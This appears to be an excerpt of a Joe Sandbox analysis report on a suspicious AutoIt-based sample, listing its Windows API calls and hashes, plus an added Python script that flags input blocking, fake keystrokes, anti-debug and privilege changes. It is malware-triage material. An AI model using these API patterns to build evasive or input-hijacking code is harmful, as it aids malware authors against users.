                                • Instruction ID: 07fca74ca5c107b802947b2a4b063b0fd25e210ee11e4a1cde1f1640c1e65a34
                                • Instruction Fuzzy Hash: 741180726106059FD710EF69C895A2EB7E8FF85324F00851EF9AADB391DB34ED058B81
                                APIs
                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CBC2E2,?,?,00000000,?), ref: 00CAD73F
                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CBC2E2,?,?,00000000,?), ref: 00CAD751
                                Similarity
                                • API ID: ErrorFormatLastMessage
                                • String ID:
                                • API String ID: 3479602957-0
                                • Opcode ID: d6c6896950a5b38ed9c3ad8727cae4b9d9afa61b8b8a7b7b8e96a301a6daa6ec
                                • Instruction ID: a8b0e4640873d9b89ec736640764137a6f9bbbc70ea3e633f24a5c5a148d4495
                                • Opcode Fuzzy Hash: d6c6896950a5b38ed9c3ad8727cae4b9d9afa61b8b8a7b7b8e96a301a6daa6ec
                                • Instruction Fuzzy Hash: 6BF0823510032DABDB21AFA4CC89FEA776CAF4A351F008115B916D6191D770DA40DBA0
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00CA4B89
                                • keybd_event.USER32(?,7608C0D0,?,00000000), ref: 00CA4B9C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InputSendkeybd_event
                                • String ID:
                                • API String ID: 3536248340-0
                                • Opcode ID: 588175852f7b0bd8d6ca8f1983801aae42e919508af0c6a4b420d61ed6dbece7
                                • Instruction ID: 4ecc4adf7abfb5323246af1cd7a38e92372bd137841a6998b5a8427f2aa361fb
                                • Opcode Fuzzy Hash: 588175852f7b0bd8d6ca8f1983801aae42e919508af0c6a4b420d61ed6dbece7
                                • Instruction Fuzzy Hash: 8FF0907080038EAFDB058FA1D805BBE7BB4EF00309F04840AF961A9191D3B9C611DFA0
                                APIs
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C9B9EC), ref: 00C9B8C5
                                • CloseHandle.KERNEL32(?,?,00C9B9EC), ref: 00C9B8D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AdjustCloseHandlePrivilegesToken
                                • String ID:
                                • API String ID: 81990902-0
                                • Opcode ID: edf552e83fbb82c9278a8a46768f27ce9c4d3414983152dc34c4279508c1260e
                                • Instruction ID: ee169c48a666a4b86e4b1f966f28e571c4f866c96a2baa83e21e599159e87b2c
                                • Opcode Fuzzy Hash: edf552e83fbb82c9278a8a46768f27ce9c4d3414983152dc34c4279508c1260e
                                • Instruction Fuzzy Hash: C4E08631000500AFE7222B50FC49E7B77EDEF05321B20841DF45684470C7225CD0EB10
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,00C6125D,00C87A43,00C60F35,?,?,00000001), ref: 00C88E41
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C88E4A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 3e62a9f90387c8aab4f26668f046c0c6d753fc33cf39e72132a9c114c8f8aa68
                                • Instruction ID: 811d9a6674fce59482190f8f241f5ae582730675f82ce872717e388e698cb31b
                                • Opcode Fuzzy Hash: 3e62a9f90387c8aab4f26668f046c0c6d753fc33cf39e72132a9c114c8f8aa68
                                • Instruction Fuzzy Hash: A1B09271044B48ABEA002BA1EC49B8E3F78EB08A62F004010F61E4C4708B6354508A92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80c8999e59561988f77df6b16ba1c8d09a1ff80cc4fcacfef2ef7eb803307ab6
                                • Instruction ID: 026c367aa7d769713796b9d0dc093da2297198206d1824baa014d95a2bf75f3e
                                • Opcode Fuzzy Hash: 80c8999e59561988f77df6b16ba1c8d09a1ff80cc4fcacfef2ef7eb803307ab6
                                • Instruction Fuzzy Hash: 29B1E320D2AF414DD7239639883133ABA5CAFBB2D5F92D71BFD1674D62EB2185838181
                                APIs
                                • BlockInput.USER32(00000001), ref: 00CB7057
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BlockInput
                                • String ID:
                                • API String ID: 3456056419-0
                                • Opcode ID: 69c75d3317696e984c19b9e539e23f1c5734f1843609442e2f87f21d74e02d6d
                                • Instruction ID: a1e6a789273aa6ce06db067f7fc63b65191e1128a72db3d750bd40865ae99a10
                                • Opcode Fuzzy Hash: 69c75d3317696e984c19b9e539e23f1c5734f1843609442e2f87f21d74e02d6d
                                • Instruction Fuzzy Hash: A7E012752042045FC710EB69D844A9AB7DC9F94750F008427F945D7251DAB0EC009B90
                                APIs
                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00CA7DF8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: mouse_event
                                • String ID:
                                • API String ID: 2434400541-0
                                • Opcode ID: aba76d750a8a05abedc82cd2ad32406d41192cd8564cec0d196eb4a59ee641f7
                                • Instruction ID: aa14e555cae03d33a61929185ea026f8afc3e67ffb76dcd4d83b2afa07beaa46
                                • Opcode Fuzzy Hash: aba76d750a8a05abedc82cd2ad32406d41192cd8564cec0d196eb4a59ee641f7
                                • Instruction Fuzzy Hash: ECD09EA596C60779FD1947209C2FF7B1118FB43789FA45749B112CA0C1EC906D446535
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: NameUser
                                • String ID:
                                • API String ID: 2645101109-0
                                • Opcode ID: da865907da96b5017f55fc58f4b03318f102161e11727c3784e078d378e39939
                                • Instruction ID: c5a90d9a392d3b8f9f6b650800cf68ae6cbc02e1b8896a7c6212fa8816311555
                                • Opcode Fuzzy Hash: da865907da96b5017f55fc58f4b03318f102161e11727c3784e078d378e39939
                                • Instruction Fuzzy Hash: 28C048B280401EEFCB55CB80C989AEFB7BCBB08300F244096A21AE2100D7719F45AB76
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C88E1F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 45983efc71e59e8631501fdae001c6f7e8fc310134a5f944b1d0882f50ab0597
                                • Instruction ID: 1494c7a0e7e3b81c05bd2bf96eb7e8e3cd87d10b08c672b1c9bf557cc22df876
                                • Opcode Fuzzy Hash: 45983efc71e59e8631501fdae001c6f7e8fc310134a5f944b1d0882f50ab0597
                                • Instruction Fuzzy Hash: E4A0243000070CF7CF001F51FC0454D7F7CD7041507004010F40D04031C733541045C1
                                APIs
                                • GetProcessHeap.KERNEL32(00C86AE9,00D167D8,00000014), ref: 00C8A937
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID:
                                • API String ID: 54951025-0
                                • Opcode ID: 5a4420465260aba7cf4af36368b9588d6e88b5ed07f94a8b2d333afc6851df1e
                                • Instruction ID: 3d93a7e1586b3fd021516f6284fe6b9729d54da83ce121e28afcedcfb312df92
                                • Opcode Fuzzy Hash: 5a4420465260aba7cf4af36368b9588d6e88b5ed07f94a8b2d333afc6851df1e
                                • Instruction Fuzzy Hash: 1BB012B03032024BD7084B38AC9431E3DD8574A111305403D7003C6661DB308450DF00
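Every "APIs" entry in these function listings has the same line shape: the API name, a dot, the exporting module, an optional argument list as the sandbox resolved it ("?" where it could not), and a "ref:" code address. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines of that shape, orders the calls by address, and tags the combinations a triager looks for first (BlockInput with a non-zero first argument, SetUnhandledExceptionFilter, AdjustTokenPrivileges, synthetic keyboard and mouse input). The rule table and tag names are my own, not Joe Sandbox signatures; the sample lines are copied from the listings on this page.

```python
import re
from collections import defaultdict

# One call line of a Joe Sandbox "APIs" listing looks like
#   • Function.MODULE(arg1,arg2,...), ref: ADDRESS
# The argument list is optional (e.g. "• DestroyWindow.USER32 ref: 00CBA7C5").
CALL_RE = re.compile(
    r"^\s*•\s*(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Sample input: call lines copied from the function listings on this page.
SAMPLE_LISTING = """\
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00CA4B89
• keybd_event.USER32(?,7608C0D0,?,00000000), ref: 00CA4B9C
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C9B9EC), ref: 00C9B8C5
• CloseHandle.KERNEL32(?,?,00C9B9EC), ref: 00C9B8D7
• SetUnhandledExceptionFilter.KERNEL32(00000000,00C6125D,00C87A43,00C60F35,?,?,00000001), ref: 00C88E41
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C88E4A
• BlockInput.USER32(00000001), ref: 00CB7057
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00CA7DF8
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C88E1F
• GetProcessHeap.KERNEL32(00C86AE9,00D167D8,00000014), ref: 00C8A937
• DestroyWindow.USER32 ref: 00CBA7C5
"""


def parse_calls(listing):
    """Return the call lines as dicts, sorted by code address.

    Lines that are not call lines (section headers, dump-source lines) are
    skipped. Sorting by 'ref' gives address order, which is usually closer to
    execution order than the order in which the report prints the calls.
    """
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [a.strip() for a in raw.split(",")]
        calls.append({
            "func": m.group("func"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
        })
    return sorted(calls, key=lambda c: c["ref"])


def _nonzero(arg):
    """True only if the sandbox resolved the argument to a non-zero value.
    '?' (unresolved) is deliberately treated as unknown, i.e. False."""
    try:
        return int(arg, 16) != 0
    except ValueError:
        return False


# Triage rules (my own, not Joe Sandbox signatures): (tag, predicate on a call).
RULES = [
    ("blocks-input", lambda c: c["func"] == "BlockInput"
                               and len(c["args"]) > 0 and _nonzero(c["args"][0])),
    ("anti-debug-seh", lambda c: c["func"] == "SetUnhandledExceptionFilter"),
    ("token-privileges", lambda c: c["func"] == "AdjustTokenPrivileges"),
    ("synthetic-input", lambda c: c["func"] in {"SendInput", "keybd_event", "mouse_event"}),
]


def classify(calls):
    """Map each tag to the (function, address) pairs that triggered it, in address order."""
    hits = defaultdict(list)
    for c in calls:
        for tag, pred in RULES:
            if pred(c):
                hits[tag].append((c["func"], f"{c['ref']:08X}"))
    return dict(hits)


if __name__ == "__main__":
    for tag, where in sorted(classify(parse_calls(SAMPLE_LISTING)).items()):
        print(tag, where)
```

The BlockInput rule checks the argument rather than the name because BlockInput(FALSE) is the matching unblock call and is not interesting on its own; when the sandbox prints "?" for that argument the rule stays silent instead of guessing.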
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                • Instruction ID: 2bae19af2deaa5ee9f481217c7cf44eab8d90ff350f61e4422d1df646256d83a
                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                • Instruction Fuzzy Hash: 6BC1F5722051A349DF6D563AC43447EFAE16EA27B932E076DD8B3CB4C0EE24C629D714
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                • Instruction ID: b382bda8da7030a3d19ef952e66d98d2a15e0f565a91414b2c9ef823b61ddf6b
                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                • Instruction Fuzzy Hash: C4C129722051A349DF6D563AC43047EBAE55AA27B931E076DD8B3CB4C0FE24C72AD724
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction ID: fb080c6c51b6fc13340b0aac62df30e6ccfa960dc9c9c0e6df1a5dc56e89082b
                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction Fuzzy Hash: 3AC1D5723051A34ADFAD563AC43447EFBA16AA27B972A076DD4B3CB0C0EE14D62CD714
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction ID: e14823f54ab1edbf3a994e428fcb1bc9b57760f94c3c6bcd095d09321292daf6
                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction Fuzzy Hash: 83C128722051A349DFAD563AC43447EBBA06EA27B972A036DD4B3CB0C1EE24C62CD714
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                • Instruction ID: 18fb68bc5dbe9dace9f2c3592db70cf3f8396ff235ad14dd57967d27b830bdd9
                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                • Instruction Fuzzy Hash: 8F41C2B1D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                • Instruction ID: 9ed411cb6629e4ccbe95fc06bfefe4419b687419d6075bc5b4d2fafd68a56de8
                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                • Instruction Fuzzy Hash: D8019278A01209EFDB45DF98C5909AEF7B5FB48310F2485DAD819A7701D730EE41DB80
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                • Instruction ID: d0ddb849ec203721570ccd78b2ae506cf879a8179ee1faddf99ff927b70fb099
                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                • Instruction Fuzzy Hash: E60192B8A00209EFDB49DF98C5909AEF7B5FB4C320F24859AD809A7701D730AE41DB80
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 00CBA7A5
                                • DeleteObject.GDI32(00000000), ref: 00CBA7B7
                                • DestroyWindow.USER32 ref: 00CBA7C5
                                • GetDesktopWindow.USER32 ref: 00CBA7DF
                                • GetWindowRect.USER32(00000000), ref: 00CBA7E6
                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CBA927
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CBA937
                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBA97F
                                • GetClientRect.USER32(00000000,?), ref: 00CBA98B
                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CBA9C5
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBA9E7
                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBA9FA
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAA05
                                • GlobalLock.KERNEL32(00000000), ref: 00CBAA0E
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAA1D
                                • GlobalUnlock.KERNEL32(00000000), ref: 00CBAA26
                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAA2D
                                • GlobalFree.KERNEL32(00000000), ref: 00CBAA38
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAA4A
                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CED9BC,00000000), ref: 00CBAA60
                                • GlobalFree.KERNEL32(00000000), ref: 00CBAA70
                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CBAA96
                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CBAAB5
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBAAD7
                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CBACC4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
